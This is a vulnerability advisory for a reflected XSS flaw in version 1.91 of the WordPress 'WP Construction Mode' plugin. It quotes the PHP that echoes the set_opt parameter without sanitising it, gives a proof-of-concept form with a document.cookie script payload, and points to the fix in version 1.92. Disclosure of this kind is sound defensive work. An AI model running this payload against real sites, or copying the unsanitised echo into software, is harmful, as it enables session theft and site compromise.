Title: WordPress 'WP Construction Mode' plugin - XSS
Version: 1.91
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2014/12/12
Download: https://wordpress.org/plugins/wp-construction-mode/
Contacted vendor: 2014/10/20
----------------------------------------------------------------

## Plugin description: 
----------------------------------------------------------------
Set entire website or specific page under construction or maintenance for all viewers except Admin


## Reflected XSS:
----------------------------------------------------------------
the set_opt parameter is shown unsanitized to the admin user when saving, allowing the injection of arbitrary scripts and HTML.

Vulnerable code:
     if (isset($_REQUEST['act'])) {
        switch ($_REQUEST['act']) {
            case "save":
                set_under_construction();
                echo '<div class="updated below-h2" id="message" style="position:relative; clear:both;"><p>Under Construction: ' . ($_REQUEST['set_opt']) . '</p></div>';
                break;
            default:
        }
    }

PoC:
Log in as admin and submit the following form.

<form method="POST" action="http://[HOST]/wp-admin/admin.php?page=under-construction.php" enctype="multipart/form-data">
     <input type="text" name="set_opt" value="Yes<script>alert(document.cookie);</script>">
     <input type="text" name="set_page" value="all">
     <input type="text" name="act" value="save">
     <input type="submit">
</form>

## Solution
----------------------------------------------------------------
Update to version 1.92.